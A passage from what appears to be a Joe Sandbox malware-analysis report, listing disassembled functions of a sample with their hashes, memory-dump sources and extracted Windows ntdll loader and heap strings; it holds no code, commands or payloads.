                                                                                                          • Opcode ID: a4880c418014f42315f8bde5de41423dfb97cd0a6252a17a8d1c98809f40b13c
                                                                                                          • Instruction ID: 28cfc9e5c18e4d708e589fcec3ff5857b3fb2ea0bc9253d61d878f8475a5e5eb
                                                                                                          • Opcode Fuzzy Hash: a4880c418014f42315f8bde5de41423dfb97cd0a6252a17a8d1c98809f40b13c
                                                                                                          • Instruction Fuzzy Hash: 6E71F1B19083259FDB61EF14C884B9B7BE8AF95764F4044A8FDC88B14AD335D188CBD1
                                                                                                          Function 00DF1140 Relevance: 5.2, Strings: 4, Instructions: 155COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 3Q$gfff$gfff$gfff
                                                                                                          • API String ID: 0-3898621068
                                                                                                          • Opcode ID: 414b566fd9a60026bd5511049a019749b7d1ab39f84b7fbd729a6d906c590ad3
                                                                                                          • Instruction ID: de14b7198cc952450481659282038b78cc093f15778a78f9c684288753304b3e
                                                                                                          • Opcode Fuzzy Hash: 414b566fd9a60026bd5511049a019749b7d1ab39f84b7fbd729a6d906c590ad3
                                                                                                          • Instruction Fuzzy Hash: 71412B3AB0010D87DB2C89AED8522B9B352E7E0354F6ED239DE1ACF3D0E535ED0146A5
                                                                                                          Function 00DF113B Relevance: 5.1, Strings: 4, Instructions: 127COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1971147679.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_df0000_NjjLYnPSZr.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 3Q$gfff$gfff$gfff
                                                                                                          • API String ID: 0-3898621068
                                                                                                          • Opcode ID: 868cd322ec5d45e48bfb5f1f6254eca0e7b4eafe6a573c1366067ba67a03ec86
                                                                                                          • Instruction ID: f3ec21e11ca9e4907ac84194225b6cf167cc7713a1eab173829c850fe8742be7
                                                                                                          • Opcode Fuzzy Hash: 868cd322ec5d45e48bfb5f1f6254eca0e7b4eafe6a573c1366067ba67a03ec86
                                                                                                          • Instruction Fuzzy Hash: 32311535B0010D87DB2C89AED8522BDB752E7D0310F1ED239DE5ACF280D535ED0186A5
                                                                                                          Function 01054D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 0109365C
                                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 01093640, 0109366C
                                                                                                          • LdrpFindDllActivationContext, xrefs: 01093636, 01093662
                                                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0109362F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                          • API String ID: 0-3779518884
                                                                                                          • Opcode ID: 854efdc94cae1721574f0d7b54f73427d33d990fecde412450492496b01b44d7
                                                                                                          • Instruction ID: d6777d27620f17031da690d51b90347fe6f02782ebc495884e41002daa10840c
                                                                                                          • Opcode Fuzzy Hash: 854efdc94cae1721574f0d7b54f73427d33d990fecde412450492496b01b44d7
                                                                                                          • Instruction Fuzzy Hash: 59310B32900611AEEFF6BA1CC848BF7B6E4BB05654F0681A6DDD4D7151F7A09CC087B5
                                                                                                          Function 0104245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0108A9A2
                                                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0108A992
                                                                                                          • LdrpDynamicShimModule, xrefs: 0108A998
                                                                                                          • apphelp.dll, xrefs: 01042462
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-176724104
                                                                                                          • Opcode ID: af336f111e9210b48bfa2a7f15195fe51632ac01e9019441f557326fee1dc405
                                                                                                          • Instruction ID: 6194593f0079141d49e92e6539a5ad7363f2d1bc370fa40c18f3ddaeef497f1b
                                                                                                          • Opcode Fuzzy Hash: af336f111e9210b48bfa2a7f15195fe51632ac01e9019441f557326fee1dc405
                                                                                                          • Instruction Fuzzy Hash: D7314875714201EBDB39AF59D980AAAFBF4FB84710F1600BAF9E067648C7B05881C740
                                                                                                          Function 010329A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • HEAP: , xrefs: 01033264
                                                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0103327D
                                                                                                          • HEAP[%wZ]: , xrefs: 01033255
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                          • API String ID: 0-617086771
                                                                                                          • Opcode ID: 5272e056d617abe72a7078502fefff9a2bd5fea24484e950caca216cd0acabd5
                                                                                                          • Instruction ID: 51b7c465c2383d66cf5efe61b7530ef635183add7ab409be0e79154d852f701b
                                                                                                          • Opcode Fuzzy Hash: 5272e056d617abe72a7078502fefff9a2bd5fea24484e950caca216cd0acabd5
                                                                                                          • Instruction Fuzzy Hash: 4C92CE70A04249DFDB65CF68C4847AEBBF5FF88300F1884A9E995AB391D735A941CF50
                                                                                                          Function 010B02C0 Relevance: 4.4, Strings: 3, Instructions: 611COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                                                                          • API String ID: 0-1670051934
                                                                                                          • Opcode ID: b96143f03f13b0dfa79c22848f3c94a30e4bae4ef1366c4a805c5c355f88a66c
                                                                                                          • Instruction ID: d2b41ea6bd3b87a8ef3789804e125194a9e844dab7b9de0beeb5fe6ae8c97a72
                                                                                                          • Opcode Fuzzy Hash: b96143f03f13b0dfa79c22848f3c94a30e4bae4ef1366c4a805c5c355f88a66c
                                                                                                          • Instruction Fuzzy Hash: C3226D72A047028FD764CF2DC8916ABFBF1BBD8210F24892EF2DA87658D771E5448B41
                                                                                                          Function 01030770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                          • API String ID: 0-4253913091
                                                                                                          • Opcode ID: 2ac87e4a21756ef9783842eecb550936372ee867e08241027b64c16e295a2a9c
                                                                                                          • Instruction ID: e725e8ca8bbc537395227b0832a837e63d63622e780883f9a915101c737db3f6
                                                                                                          • Opcode Fuzzy Hash: 2ac87e4a21756ef9783842eecb550936372ee867e08241027b64c16e295a2a9c
                                                                                                          • Instruction Fuzzy Hash: 8EF1CE30605606DFEB25DF68C884BAEB7F9FF85304F1481A9E4969B385D734E981CB90
                                                                                                          Function 01021460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • HEAP: , xrefs: 01021596
                                                                                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01021728
                                                                                                          • HEAP[%wZ]: , xrefs: 01021712
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                          • API String ID: 0-3178619729
                                                                                                          • Opcode ID: 320bc20c3c43a6bc34386eeccdb5ebb369fe8571fdfcd20e88f55be3370aa49c
                                                                                                          • Instruction ID: 8578a364e7103bcfeedfd59e79f8047784edd936329fea4079d6037bf4e677bd
                                                                                                          • Opcode Fuzzy Hash: 320bc20c3c43a6bc34386eeccdb5ebb369fe8571fdfcd20e88f55be3370aa49c
                                                                                                          • Instruction Fuzzy Hash: 71E1E030A046669FDB29CF28C495ABEBBF1BF48304F188599E5D6CB246D734E941CB50
                                                                                                          Function 01046962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $@
                                                                                                          • API String ID: 0-1077428164
                                                                                                          • Opcode ID: 54d1b6732ac962dbc734d1b9c060b332ca1d5f52a08f353247a1ff07620765cd
                                                                                                          • Instruction ID: 8070829215b1bf8fe26335222490d9bd1e9763a0453f667387a41368d39c828e
                                                                                                          • Opcode Fuzzy Hash: 54d1b6732ac962dbc734d1b9c060b332ca1d5f52a08f353247a1ff07620765cd
                                                                                                          • Instruction Fuzzy Hash: 2FC280B16083419FE765CF28C980BABBBE5BF89714F04896DF9C987241E735D844CB62
                                                                                                          Function 0101A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                                                          • API String ID: 0-2779062949
                                                                                                          • Opcode ID: b5aad50457b054e381829809e6b88fbcbd31b33cb3ff2a456bb539a2e8d24714
                                                                                                          • Instruction ID: f53bddf8eba6613ee0e23d8ea55d7073c2b114efea3b853a21fcc8a5249314ee
                                                                                                          • Opcode Fuzzy Hash: b5aad50457b054e381829809e6b88fbcbd31b33cb3ff2a456bb539a2e8d24714
                                                                                                          • Instruction Fuzzy Hash: ABA17F71D1122A9BEB31DF68CD88BEAB7B8EF44700F0041EAE949A7250D7359E84CF54
                                                                                                          Function 01040BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0108A121
                                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 0108A10F
                                                                                                          • LdrpCheckModule, xrefs: 0108A117
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-161242083
                                                                                                          • Opcode ID: 87b52f3686ce3672b46677836dec3fd9946f86b624ba1d0542deadbda8e74204
                                                                                                          • Instruction ID: 2a6151d4e69a2e23f0f047cc2cceff3c999a4bda01d94a806b0d2bbd71704652
                                                                                                          • Opcode Fuzzy Hash: 87b52f3686ce3672b46677836dec3fd9946f86b624ba1d0542deadbda8e74204
                                                                                                          • Instruction Fuzzy Hash: 7A71E2B0A0020ADFDB29EF68C980AEEB7F4FB44304F14407DE992A7655D774A981CB54
                                                                                                          Function 01030A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                          • API String ID: 0-1334570610
                                                                                                          • Opcode ID: cdfb2550545b29803fea3a2f8e3c7e3d79752c3c196c753d350cd9ea3b22de29
                                                                                                          • Instruction ID: 4d41d1d6cc4aad4e43bd4378a8e39d0f9200b25478e1bed491e69fda5f7db09b
                                                                                                          • Opcode Fuzzy Hash: cdfb2550545b29803fea3a2f8e3c7e3d79752c3c196c753d350cd9ea3b22de29
                                                                                                          • Instruction Fuzzy Hash: 1E610270605305DFDB29DF28C840BAABBE5FF85304F1485A9E4D98F29AD770E881CB91
                                                                                                          Function 0105C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 010982E8
                                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 010982DE
                                                                                                          • Failed to reallocate the system dirs string !, xrefs: 010982D7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-1783798831
                                                                                                          • Opcode ID: 71d7eef58f66d9cdd6744dbc8c298816916caff0320a3d6a1f911cb94fc7ce3a
                                                                                                          • Instruction ID: 1e1ef166de3cedc577f33a5fa193b5355213ba80ba1d107e3a669c5b5fb7c0e2
                                                                                                          • Opcode Fuzzy Hash: 71d7eef58f66d9cdd6744dbc8c298816916caff0320a3d6a1f911cb94fc7ce3a
                                                                                                          • Instruction Fuzzy Hash: 1241EFB1504309ABD765EB68DA44B9BB7E8FF48B50F00493AF9A4D7294E770E840CB91
                                                                                                          Function 010DC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 010DC1C5
                                                                                                          • @, xrefs: 010DC1F1
                                                                                                          • PreferredUILanguages, xrefs: 010DC212
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                          • API String ID: 0-2968386058
                                                                                                          • Opcode ID: 6104ada44cc48f715680f14ecc043d36a7020e6ab58c935b3ee201b04bd30662
                                                                                                          • Instruction ID: bc1af31c153b50f8e9dfd3dbb58441acbb756fa50117ad4fc641619283c008bb
                                                                                                          • Opcode Fuzzy Hash: 6104ada44cc48f715680f14ecc043d36a7020e6ab58c935b3ee201b04bd30662
                                                                                                          • Instruction Fuzzy Hash: 91416171E00309EBEB51DAD8C981BEEBBFDAB54700F14416AE689B7284D7749E44CB50
                                                                                                          Function 010B4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                          • API String ID: 0-1373925480
                                                                                                          • Opcode ID: ae35ff4b9cc27a298010d3251c86da4099738e5063587642c8f9d6b09df8405c
                                                                                                          • Instruction ID: 99554143ceaf04495c9d280f77728ae0595f511aeb07f20d202e4204de52a781
                                                                                                          • Opcode Fuzzy Hash: ae35ff4b9cc27a298010d3251c86da4099738e5063587642c8f9d6b09df8405c
                                                                                                          • Instruction Fuzzy Hash: 5241E4719006598BEB25DB98D884BEDBBF8FF55340F1408A9D982EF792D6349A01CB50
                                                                                                          Function 010A4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 010A4899
                                                                                                          • LdrpCheckRedirection, xrefs: 010A488F
                                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 010A4888
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                          • API String ID: 0-3154609507
                                                                                                          • Opcode ID: ba428cacbcf6e62cecc1335293d680e9c77895816bb13fc0ec38a492d714e348
                                                                                                          • Instruction ID: a472554cba1e1b354912e4c671926a18a8f592c567fe498d97bae61b6da8174b
                                                                                                          • Opcode Fuzzy Hash: ba428cacbcf6e62cecc1335293d680e9c77895816bb13fc0ec38a492d714e348
                                                                                                          • Instruction Fuzzy Hash: 8241D33AA047919FCB61CE98E940A6EBBE5FF49A50B4901A9EDD5D7251D3B0E800CB81
                                                                                                          Function 01030BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                          • API String ID: 0-2558761708
                                                                                                          • Opcode ID: 5bb63a199c5f09e219c811edfa39bc8a0bb8a4b198cd22e8f7855f972bdfd861
                                                                                                          • Instruction ID: d994440bf35364dcde6f875246764512a978cb58a9ee25a94758c74d60b6fb8d
                                                                                                          • Opcode Fuzzy Hash: 5bb63a199c5f09e219c811edfa39bc8a0bb8a4b198cd22e8f7855f972bdfd861
                                                                                                          • Instruction Fuzzy Hash: CC11D23131A5029FDB5DDA18C841BBAB3A9EF80619F1881A9F4C6CB259DF34D841C751
                                                                                                          Function 010A20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 010A2104
                                                                                                          • Process initialization failed with status 0x%08lx, xrefs: 010A20F3
                                                                                                          • LdrpInitializationFailure, xrefs: 010A20FA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-2986994758
                                                                                                          • Opcode ID: 1315712f899e7b4dc7be8344868dca51dae1c5dd65afc6cdabe56080e2eb0f70
                                                                                                          • Instruction ID: 978f8eec0f9a646a80152d39f0140fb6154b7c05ab4639db0a7254a9a54ff69e
                                                                                                          • Opcode Fuzzy Hash: 1315712f899e7b4dc7be8344868dca51dae1c5dd65afc6cdabe56080e2eb0f70
                                                                                                          • Instruction Fuzzy Hash: 44F02835640309ABE724D64CDD46F9577A8EB41B14F900068F7806B2C5D5B0A940C741
                                                                                                          Function 010303E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: #%u
                                                                                                          • API String ID: 48624451-232158463
                                                                                                          • Opcode ID: 8a470dadfa99e1dcb9477176955282972cf00d7438a39682d364b74774d70fd2
                                                                                                          • Instruction ID: 43b0f46a52941a112851445603fbd1e2e9c5befabae8d1bc2e5ee5439ff7022d
                                                                                                          • Opcode Fuzzy Hash: 8a470dadfa99e1dcb9477176955282972cf00d7438a39682d364b74774d70fd2
                                                                                                          • Instruction Fuzzy Hash: D9715D71A0024A9FDB05EF98D994FEEB7F8BF48304F144065E985EB251EA34EE01CB60
                                                                                                          Function 010352A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$@
                                                                                                          • API String ID: 0-149943524
                                                                                                          • Opcode ID: 7e159fff6ad2bfd66bb4110066f03dd85ee9084a3ab8da4e766b62b9b9422552
                                                                                                          • Instruction ID: 7d8861302600ba6a60e9a61a2ac618716d96ebee4ab3bf9e59ba48f4f793bc33
                                                                                                          • Opcode Fuzzy Hash: 7e159fff6ad2bfd66bb4110066f03dd85ee9084a3ab8da4e766b62b9b9422552
                                                                                                          • Instruction Fuzzy Hash: 28329C705083118BD7689F18C880B7EBBE9EFC8744F15496EFAC59B2A0E735D840DB92
                                                                                                          Function 0102A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • LdrResSearchResource Exit, xrefs: 0102AA25
                                                                                                          • LdrResSearchResource Enter, xrefs: 0102AA13
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                          • API String ID: 0-4066393604
                                                                                                          • Opcode ID: 5a497eff2be2635a569ba906e21199c00cacfeca745b45aaabdf590f2b241d19
                                                                                                          • Instruction ID: 6eab923b05b46d18760dbba067b5ad684cf1644f78c6173e57e8b3f5a2f28957
                                                                                                          • Opcode Fuzzy Hash: 5a497eff2be2635a569ba906e21199c00cacfeca745b45aaabdf590f2b241d19
                                                                                                          • Instruction Fuzzy Hash: A6E18E71F04229DFEF22DA98C980BEEBBB9BF44710F104466E981EB652DB34D941CB50
                                                                                                          Function 010EA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: `$`
                                                                                                          • API String ID: 0-197956300
                                                                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                          • Instruction ID: 70ab48902953deab7d3964e8deb6b4a39dc5b6d60ae25f9a062e40fee1fd6d4b
                                                                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                          • Instruction Fuzzy Hash: 40C1AE713043429FEB24CE2AC849B6BBBE5AFD8318F084A2DF6D68B290D775D505CB51
                                                                                                          Function 01020CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • Failed to retrieve service checksum., xrefs: 0107EE56
                                                                                                          • ResIdCount less than 2., xrefs: 0107EEC9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                                          • API String ID: 0-863616075
                                                                                                          • Opcode ID: 436f9695c1263ac23525190da2ea882c237d2de788e9fa53c7910a3fec90b5c6
                                                                                                          • Instruction ID: 07abdb183d5e9de31262e25747df86a0540a6bb44dfff2e9a9a78426442c6510
                                                                                                          • Opcode Fuzzy Hash: 436f9695c1263ac23525190da2ea882c237d2de788e9fa53c7910a3fec90b5c6
                                                                                                          • Instruction Fuzzy Hash: D8E1F1B19183849FE365CF15C440BABFBE0BB88314F408A2EE5D99B384D7719949CF96
                                                                                                          Function 00DF12F0 Relevance: 2.7, Strings: 2, Instructions: 187COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971161309.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
